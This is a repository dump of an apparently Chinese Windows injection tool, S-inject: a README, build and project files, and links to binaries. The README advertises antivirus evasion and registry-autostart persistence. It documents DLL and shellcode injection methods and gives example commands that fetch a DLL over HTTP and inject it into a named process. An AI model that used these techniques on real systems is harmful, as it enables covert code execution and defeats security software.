https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240606224950591.png


--------------------------------------------------------------------------------
/README.assets/image-20240606225058387.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20240606225058387.png


--------------------------------------------------------------------------------
/README.assets/image-20250217173155506.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20250217173155506.png


--------------------------------------------------------------------------------
/README.assets/image-20250217193111847.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20250217193111847.png


--------------------------------------------------------------------------------
/README.assets/image-20250217193433513.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20250217193433513.png


--------------------------------------------------------------------------------
/README.assets/image-20250219105506042.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20250219105506042.png


--------------------------------------------------------------------------------
/README.assets/image-20250219105558106.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/README.assets/image-20250219105558106.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | ![](https://img.shields.io/badge/joe1sn-S_inject-green)  ![](https://img.shields.io/badge/windows-C++-yellow)
  2 | 
  3 | <h1><p align="center">S-inject</p></h1>
  4 | 
  5 | <p align="center">DLL+Shellcode的Windows注入免杀工具</p>
  6 | 
  7 | <p align="center"><img src="./README.assets/image-20240205141410967.png"></p>
  8 | 
  9 | 只是罗列各种方法，免杀推荐搭配其他技巧，要具体灵活使用
 10 | 
 11 | **须知：**
 12 | 
 13 | 1. 反射式注入参考了著名github项目：https://github.com/stephenfewer/ReflectiveDLLInjection
 14 |    该项目为反射式注入支持的DLL
 15 | 2. Shellcode使用base64编码后的shellcode
 16 | 3. 相关测试的DLL文件在`Test Files`文件夹中
 17 | 
 18 | **免责声明：** 本工具仅供教育和授权测试目的使用。开发者及贡献者不支持、不鼓励也不赞成任何非法或未经授权的使用。 用户有责任确保其使用本工具的行为符合所有适用的法律法规。严禁将本工具用于任何未经授权的活动。 开发者及贡献者对使用本工具造成的任何损害或后果不承担责任。使用前请自行承担风险。 通过使用本工具，您同意这些条款，并对您的行为承担全部责任。
 19 | 
 20 | # Update
 21 | 
 22 | - **[2025-4-6]** **重要：** 新创建分支(branch)：mcp，相关的DLL在这里维护。MCP模型上下文协议自动完成注入项目地址：https://github.com/Joe1sn/inject-mcp
 23 | - **[2025-4-3]** 使用gui界面时自动生成`imgui.ini`，优化界面排版
 24 | 
 25 | - **[2025-2-19]** 变化主题
 26 | - **[2025-2-17]**
 27 | 
 28 | 1. 新增远程URL加载DLL
 29 | 2. 由于 [issues 4](https://github.com/Joe1sn/S-inject/issues/4)等的反应，使用参数快速完成注入
 30 | 
 31 | - **[2024-7-7]** 优化一个进程选择Bug，详细见 [issues 2](https://github.com/Joe1sn/S-inject/issues/2)
 32 | - **[2024-6-18]** 修复选择进程和遍历进程快速闪烁的问题。修复后需要重新开打功能才能看到新的进程。
 33 | - **[2024-6-6]** 
 34 | 
 35 | 1. 更好的GUI布局，支持Docking。
 36 |   2. 代码整理，优化项目文件结构，尽量贴合我认为（~~知道~~）的现代cpp规范。
 37 |   3. 遍历部分使用 `NtQuerySystemInformation`  （虽然会导致快速刷新）
 38 | 
 39 | - **[2024-5-24]**  **更新GUI图形化界面**，之前版本只保留原始二进制文件。貌似之前就被defender识别到了....
 40 | 
 41 | - **[2024-5-16]** 更新远程线程注入，让取消DLL注入更加便捷，便于第二次注入
 42 | - **[2024-4-1]** 更新DLL的暴力注入，详细见readme->使用->DLL自动注入/暴力注入
 43 | - **[2024-3-8]** 更新64位`CreateRemoteThread`为直接系统调用，方法采用`SysWhispers3`项目
 44 | 
 45 | # New Feature
 46 | 
 47 | - [2025-2-19] V2.2.1更新
 48 | 
 49 |   更换了主题配色，更多配色在`app/utils/theme.hpp`内，更换主题需要重新编译（因为有的主题没有测试完，所以暂时不会运行时改变主题）
 50 | 
 51 |   ![image-20250219105558106](./README.assets/image-20250219105558106.png)
 52 | 
 53 | - [2025-2-17] V2.2更新
 54 | 
 55 |   1. 新增远程URL进行Get请求加载DLL，可以实现dll文件不落地加载dll，由于依赖反射式注入，所以dll的格式应该与反射式注入的相同，格式为：https://github.com/stephenfewer/ReflectiveDLLInjection
 56 | 
 57 |      ![image-20250217173155506](./README.assets/image-20250217173155506.png)
 58 | 
 59 |   2. 添加参数可以快速完成注入
 60 | 
 61 |      `-method`：使用的注入方法
 62 | 
 63 |      - `rmtdll`：远程线程注入DLL
 64 |      - `refdll`：反射式注入DLL
 65 |      - `apcdll`：APC队列注入DLL
 66 | 
 67 |      - `net`：从网络加载DLL注入DLL
 68 |      - `rmtsc`：远程线程注入Shellcode
 69 |      - `apcsc`：APC队列注入Shellcode
 70 |      - `ctxsc`：上下文注入Shellcode
 71 | 
 72 |      `-proc`：注入进程的名字
 73 | 
 74 |      `-path`：dll的文件路径、dll的url（http开头）、base64后的shellcode
 75 | 
 76 |      `-pid`：进程`PID`
 77 | 
 78 |      用例
 79 | 
 80 |      ```
 81 |      .\S-Inject_x86_gui.exe -method net -proc "x32dbg" -path "http://127.0.0.1/reflective_x86.dll"
 82 |      ```
 83 | 
 84 |      ![image-20250217193111847](./README.assets/image-20250217193111847.png)
 85 | 
 86 |      可以据此编写对应的bat脚本来实现自动注入，如这里的`test.bat`
 87 | 
 88 |      ```
 89 |      @echo off
 90 |      D:\Github\S-inject\Release\S-Inject.exe -method net -proc "x32dbg" -path "http://127.0.0.1/reflective_x86.dll"
 91 |      pause
 92 |      ```
 93 | 
 94 |      这样双击该bat脚本即可向`x32dbg`的进程使用`网络加载`注入url为`http://127.0.0.1/reflective_x86.dll`的dll
 95 | 
 96 | - [2024-6-6] V2.1更新
 97 | 
 98 |   1. Docking，拖拽可以重新排版
 99 | 
100 |      ![image-20240606124658850](./README.assets/image-20240606124658850.png)
101 |      
102 |   2. ImGUI窗口排版通过`imgui.ini`保存，可参考我的排版（ini文件位于bin中，使用时放于同一目录下）
103 |   
104 |      ![image-20240606224950591](./README.assets/image-20240606224950591.png)
105 | 
106 | # 免杀效果
107 | 
108 | 远程shellcode注入等功能可免杀火绒，VNC无感，可注册表添加开机自启动
109 | 
110 | ![image-20240216112653373](./README.assets/image-20240216112653373.png)
111 | 
112 | ![image-20240216113029381](./README.assets/image-20240216113029381.png)
113 | 
114 | ![image-20240216113432922](./README.assets/image-20240216113432922.png)
115 | 
116 | ![image-20240216113917066](./README.assets/image-20240216113917066.png)
117 | 
118 | # 支持功能
119 | 
120 | ![image-20240205124826998](./README.assets/image-20240205124826998.png)
121 | 
122 | **DLL注入**
123 | 
124 | - 远程线程注入
125 | - 反射式注入
126 | - APC调度注入
127 | 
128 | **Shellcode注入**
129 | 
130 | - 远程线程注入
131 | - APC调度注入
132 | - Context上下文注入
133 | 
134 | **可注入进程遍历**
135 | 
136 | # 使用
137 | 
138 | 1.x版本（无图像化界面）使用说明见：`oldREADME.md`
139 | 
140 | ![image-20250217193433513](./README.assets/image-20250217193433513.png)
141 | 
142 | 直接勾选对应功能，选择DLL/Shellcode，和对应进程的PID
143 | 
144 | <img src="./README.assets/image-20240520101608876.png" alt="image-20240520101608876" style="zoom: 80%;" />
145 | 
146 | ![image-20240520101704029](./README.assets/image-20240520101704029.png)
147 | 
148 | 最后点击`start`开始注入
149 | 


--------------------------------------------------------------------------------
/Test Files/TestDll_x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/Test Files/TestDll_x64.dll


--------------------------------------------------------------------------------
/Test Files/TestDll_x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/Test Files/TestDll_x86.dll


--------------------------------------------------------------------------------
/Test Files/reflective_x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/Test Files/reflective_x64.dll


--------------------------------------------------------------------------------
/Test Files/reflective_x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/Test Files/reflective_x86.dll


--------------------------------------------------------------------------------
/X-Inject.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.9.34902.65
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "S-Inject", "X-Inject\X-Inject.vcxproj", "{1360A187-B6B2-474B-904A-7DCCA715E16B}"
 7 | EndProject
 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectLib", "InjectLib\InjectLib.vcxproj", "{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}"
 9 | EndProject
10 | Global
11 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | 		Debug|x64 = Debug|x64
13 | 		Debug|x86 = Debug|x86
14 | 		Release|x64 = Release|x64
15 | 		Release|x86 = Release|x86
16 | 	EndGlobalSection
17 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Debug|x64.Build.0 = Debug|x64
20 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Debug|x86.ActiveCfg = Debug|Win32
21 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Debug|x86.Build.0 = Debug|Win32
22 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Release|x64.ActiveCfg = Release|x64
23 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Release|x64.Build.0 = Release|x64
24 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Release|x86.ActiveCfg = Release|Win32
25 | 		{1360A187-B6B2-474B-904A-7DCCA715E16B}.Release|x86.Build.0 = Release|Win32
26 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Debug|x64.ActiveCfg = Debug|x64
27 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Debug|x64.Build.0 = Debug|x64
28 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Debug|x86.ActiveCfg = Debug|Win32
29 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Debug|x86.Build.0 = Debug|Win32
30 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Release|x64.ActiveCfg = Release|x64
31 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Release|x64.Build.0 = Release|x64
32 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Release|x86.ActiveCfg = Release|Win32
33 | 		{DAE5DCC7-F89A-4265-AA2B-BBF9FB48C96E}.Release|x86.Build.0 = Release|Win32
34 | 	EndGlobalSection
35 | 	GlobalSection(SolutionProperties) = preSolution
36 | 		HideSolutionNode = FALSE
37 | 	EndGlobalSection
38 | 	GlobalSection(ExtensibilityGlobals) = postSolution
39 | 		SolutionGuid = {575FA067-6742-45A2-8FF1-C8804F137705}
40 | 	EndGlobalSection
41 | EndGlobal
42 | 


--------------------------------------------------------------------------------
/X-Inject/S-Inject.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/S-Inject.aps


--------------------------------------------------------------------------------
/X-Inject/S-Inject.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Joe1sn/S-inject/0bb92bd0cc9eeafc4bea4fe15ddd5f9143838c90/X-Inject/S-Inject.rc


--------------------------------------------------------------------------------
/X-Inject/X-Inject.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{1360a187-b6b2-474b-904a-7dcca715e16b}</ProjectGuid>
 25 |     <RootNamespace>X_Inject</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |     <ProjectName>S-Inject</ProjectName>
 28 |   </PropertyGroup>
 29 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 30 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 31 |     <ConfigurationType>Application</ConfigurationType>
 32 |     <UseDebugLibraries>true</UseDebugLibraries>
 33 |     <PlatformToolset>v143</PlatformToolset>
 34 |     <CharacterSet>Unicode</CharacterSet>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>Application</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v143</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>Unicode</CharacterSet>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 44 |     <ConfigurationType>Application</ConfigurationType>
 45 |     <UseDebugLibraries>true</UseDebugLibraries>
 46 |     <PlatformToolset>v143</PlatformToolset>
 47 |     <CharacterSet>Unicode</CharacterSet>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>Application</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v143</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>Unicode</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 75 |     <GenerateManifest>false</GenerateManifest>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 78 |     <GenerateManifest>false</GenerateManifest>
 79 |   </PropertyGroup>
 80 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 81 |     <ClCompile>
 82 |       <WarningLevel>Level3</WarningLevel>
 83 |       <SDLCheck>true</SDLCheck>
 84 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 85 |       <ConformanceMode>true</ConformanceMode>
 86 |       <LanguageStandard>stdcpp20</LanguageStandard>
 87 |       <LanguageStandard_C>stdc11</LanguageStandard_C>
 88 |     </ClCompile>
 89 |     <Link>
 90 |       <SubSystem>Windows</SubSystem>
 91 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 92 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;%(AdditionalDependencies)</AdditionalDependencies>
 93 |     </Link>
 94 |   </ItemDefinitionGroup>
 95 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 96 |     <ClCompile>
 97 |       <WarningLevel>Level3</WarningLevel>
 98 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 99 |       <IntrinsicFunctions>true</IntrinsicFunctions>
100 |       <SDLCheck>true</SDLCheck>
101 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |       <ConformanceMode>true</ConformanceMode>
103 |       <LanguageStandard>stdcpp20</LanguageStandard>
104 |       <LanguageStandard_C>stdc11</LanguageStandard_C>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Windows</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>false</GenerateDebugInformation>
111 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;%(AdditionalDependencies)</AdditionalDependencies>
112 |       <ManifestFile />
113 |       <ProgramDatabaseFile />
114 |     </Link>
115 |   </ItemDefinitionGroup>
116 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
117 |     <ClCompile>
118 |       <WarningLevel>Level3</WarningLevel>
119 |       <SDLCheck>true</SDLCheck>
120 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
121 |       <ConformanceMode>true</ConformanceMode>
122 |       <LanguageStandard>stdcpp20</LanguageStandard>
123 |       <LanguageStandard_C>stdc11</LanguageStandard_C>
124 |     </ClCompile>
125 |     <Link>
126 |       <SubSystem>Windows</SubSystem>
127 |       <GenerateDebugInformation>true</GenerateDebugInformation>
128 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;%(AdditionalDependencies)</AdditionalDependencies>
129 |     </Link>
130 |   </ItemDefinitionGroup>
131 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
132 |     <ClCompile>
133 |       <WarningLevel>Level3</WarningLevel>
134 |       <FunctionLevelLinking>true</FunctionLevelLinking>
135 |       <IntrinsicFunctions>true</IntrinsicFunctions>
136 |       <SDLCheck>true</SDLCheck>
137 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
138 |       <ConformanceMode>true</ConformanceMode>
139 |       <LanguageStandard>stdcpp20</LanguageStandard>
140 |       <LanguageStandard_C>stdc11</LanguageStandard_C>
141 |     </ClCompile>
142 |     <Link>
143 |       <SubSystem>Windows</SubSystem>
144 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
145 |       <OptimizeReferences>true</OptimizeReferences>
146 |       <GenerateDebugInformation>false</GenerateDebugInformation>
147 |       <AdditionalDependencies>d3d11.lib;Crypt32.lib;wininet.lib;%(AdditionalDependencies)</AdditionalDependencies>
148 |       <ManifestFile />
149 |       <ProgramDatabaseFile />
150 |     </Link>
151 |   </ItemDefinitionGroup>
152 |   <ItemGroup>
153 |     <ClCompile Include="app\S-Wisper.c" />
154 |     <ClCompile Include="ext\imgui.cpp" />
155 |     <ClCompile Include="ext\imgui_demo.cpp" />
156 |     <ClCompile Include="ext\imgui_draw.cpp" />
157 |     <ClCompile Include="ext\imgui_impl_dx11.cpp" />
158 |     <ClCompile Include="ext\imgui_impl_win32.cpp" />
159 |     <ClCompile Include="ext\imgui_tables.cpp" />
160 |     <ClCompile Include="ext\imgui_widgets.cpp" />
161 |     <ClCompile Include="global.cpp" />
162 |     <ClCompile Include="app\Injector.cpp" />
163 |     <ClCompile Include="main.cpp" />
164 |     <ClCompile Include="app\window.cpp" />
165 |   </ItemGroup>
166 |   <ItemGroup>
167 |     <ClInclude Include="app\S-Wisper.h" />
168 |     <ClInclude Include="app\utils\crypto.hpp" />
169 |     <ClInclude Include="app\utils\error.hpp" />
170 |     <ClInclude Include="app\utils\helper.hpp" />
171 |     <ClInclude Include="app\utils\query.hpp" />
172 |     <ClInclude Include="app\utils\spectrum.h" />
173 |     <ClInclude Include="app\utils\theme.hpp" />
174 |     <ClInclude Include="ext\imconfig.h" />
175 |     <ClInclude Include="ext\imgui.h" />
176 |     <ClInclude Include="ext\imgui_impl_dx11.h" />
177 |     <ClInclude Include="ext\imgui_impl_win32.h" />
178 |     <ClInclude Include="ext\imgui_internal.h" />
179 |     <ClInclude Include="ext\imstb_rectpack.h" />
180 |     <ClInclude Include="ext\imstb_textedit.h" />
181 |     <ClInclude Include="ext\imstb_truetype.h" />
182 |     <ClInclude Include="global.h" />
183 |     <ClInclude Include="app\window.h" />
184 |     <ClInclude Include="app\Injector.h" />
185 |     <ClInclude Include="resource.h" />
186 |   </ItemGroup>
187 |   <ItemGroup>
188 |     <CustomBuild Include="app\S-Wisper-asm.x64.asm">
189 |       <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</ExcludedFromBuild>
190 |       <FileType>Document</FileType>
191 |       <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild>
192 |       <Command Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">ml64 /Fo $(IntDir)%(fileName).obj /c /Cp app\%(fileName).asm</Command>
193 |       <Outputs Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(IntDir)%(fileName).obj;%(Outputs)</Outputs>
194 |       <Command Condition="'$(Configuration)|$(Platform)'=='Release|x64'">ml64 /Fo $(IntDir)%(fileName).obj /c /Cp app\%(fileName).asm</Command>
195 |       <Outputs Condition="'$(Configuration)|$(Platform)'=='Release|x64'">$(IntDir)%(fileName).obj;%(Outputs)</Outputs>
196 |     </CustomBuild>
197 |   </ItemGroup>
198 |   <ItemGroup>
199 |     <ResourceCompile Include="S-Inject.rc" />
200 |   </ItemGroup>
201 |   <ItemGroup>
202 |     <Image Include="..\ICON.ico" />
203 |   </ItemGroup>
204 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
205 |   <ImportGroup Label="ExtensionTargets">
206 |   </ImportGroup>
207 | </Project>


--------------------------------------------------------------------------------
/X-Inject/X-Inject.vcxproj.filters:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup>
  4 |     <Filter Include="源文件">
  5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
  6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
  7 |     </Filter>
  8 |     <Filter Include="头文件">
  9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
 10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
 11 |     </Filter>
 12 |     <Filter Include="资源文件">
 13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
 14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
 15 |     </Filter>
 16 |   </ItemGroup>
 17 |   <ItemGroup>
 18 |     <ClCompile Include="main.cpp">
 19 |       <Filter>源文件</Filter>
 20 |     </ClCompile>
 21 |     <ClCompile Include="ext\imgui.cpp">
 22 |       <Filter>源文件</Filter>
 23 |     </ClCompile>
 24 |     <ClCompile Include="ext\imgui_demo.cpp">
 25 |       <Filter>源文件</Filter>
 26 |     </ClCompile>
 27 |     <ClCompile Include="ext\imgui_draw.cpp">
 28 |       <Filter>源文件</Filter>
 29 |     </ClCompile>
 30 |     <ClCompile Include="ext\imgui_tables.cpp">
 31 |       <Filter>源文件</Filter>
 32 |     </ClCompile>
 33 |     <ClCompile Include="ext\imgui_widgets.cpp">
 34 |       <Filter>源文件</Filter>
 35 |     </ClCompile>
 36 |     <ClCompile Include="ext\imgui_impl_win32.cpp">
 37 |       <Filter>源文件</Filter>
 38 |     </ClCompile>
 39 |     <ClCompile Include="ext\imgui_impl_dx11.cpp">
 40 |       <Filter>源文件</Filter>
 41 |     </ClCompile>
 42 |     <ClCompile Include="app\window.cpp">
 43 |       <Filter>源文件</Filter>
 44 |     </ClCompile>
 45 |     <ClCompile Include="global.cpp">
 46 |       <Filter>源文件</Filter>
 47 |     </ClCompile>
 48 |     <ClCompile Include="app\Injector.cpp">
 49 |       <Filter>源文件</Filter>
 50 |     </ClCompile>
 51 |     <ClCompile Include="app\S-Wisper.c">
 52 |       <Filter>源文件</Filter>
 53 |     </ClCompile>
 54 |   </ItemGroup>
 55 |   <ItemGroup>
 56 |     <ClInclude Include="ext\imconfig.h">
 57 |       <Filter>头文件</Filter>
 58 |     </ClInclude>
 59 |     <ClInclude Include="ext\imgui.h">
 60 |       <Filter>头文件</Filter>
 61 |     </ClInclude>
 62 |     <ClInclude Include="ext\imgui_internal.h">
 63 |       <Filter>头文件</Filter>
 64 |     </ClInclude>
 65 |     <ClInclude Include="ext\imstb_rectpack.h">
 66 |       <Filter>头文件</Filter>
 67 |     </ClInclude>
 68 |     <ClInclude Include="ext\imstb_textedit.h">
 69 |       <Filter>头文件</Filter>
 70 |     </ClInclude>
 71 |     <ClInclude Include="ext\imstb_truetype.h">
 72 |       <Filter>头文件</Filter>
 73 |     </ClInclude>
 74 |     <ClInclude Include="ext\imgui_impl_win32.h">
 75 |       <Filter>头文件</Filter>
 76 |     </ClInclude>
 77 |     <ClInclude Include="ext\imgui_impl_dx11.h">
 78 |       <Filter>头文件</Filter>
 79 |     </ClInclude>
 80 |     <ClInclude Include="global.h">
 81 |       <Filter>头文件</Filter>
 82 |     </ClInclude>
 83 |     <ClInclude Include="app\window.h">
 84 |       <Filter>头文件</Filter>
 85 |     </ClInclude>
 86 |     <ClInclude Include="app\Injector.h">
 87 |       <Filter>头文件</Filter>
 88 |     </ClInclude>
 89 |     <ClInclude Include="app\S-Wisper.h">
 90 |       <Filter>头文件</Filter>
 91 |     </ClInclude>
 92 |     <ClInclude Include="app\utils\crypto.hpp">
 93 |       <Filter>头文件</Filter>
 94 |     </ClInclude>
 95 |     <ClInclude Include="app\utils\error.hpp">
 96 |       <Filter>头文件</Filter>
 97 |     </ClInclude>
 98 |     <ClInclude Include="app\utils\query.hpp">
 99 |       <Filter>头文件</Filter>
100 |     </ClInclude>
101 |     <ClInclude Include="resource.h">
102 |       <Filter>头文件</Filter>
103 |     </ClInclude>
104 |     <ClInclude Include="app\utils\helper.hpp">
105 |       <Filter>头文件</Filter>
106 |     </ClInclude>
107 |     <ClInclude Include="app\utils\theme.hpp">
108 |       <Filter>头文件</Filter>
109 |     </ClInclude>
110 |     <ClInclude Include="app\utils\spectrum.h">
111 |       <Filter>头文件</Filter>
112 |     </ClInclude>
113 |   </ItemGroup>
114 |   <ItemGroup>
115 |     <CustomBuild Include="app\S-Wisper-asm.x64.asm">
116 |       <Filter>源文件</Filter>
117 |     </CustomBuild>
118 |   </ItemGroup>
119 |   <ItemGroup>
120 |     <ResourceCompile Include="S-Inject.rc">
121 |       <Filter>资源文件</Filter>
122 |     </ResourceCompile>
123 |   </ItemGroup>
124 |   <ItemGroup>
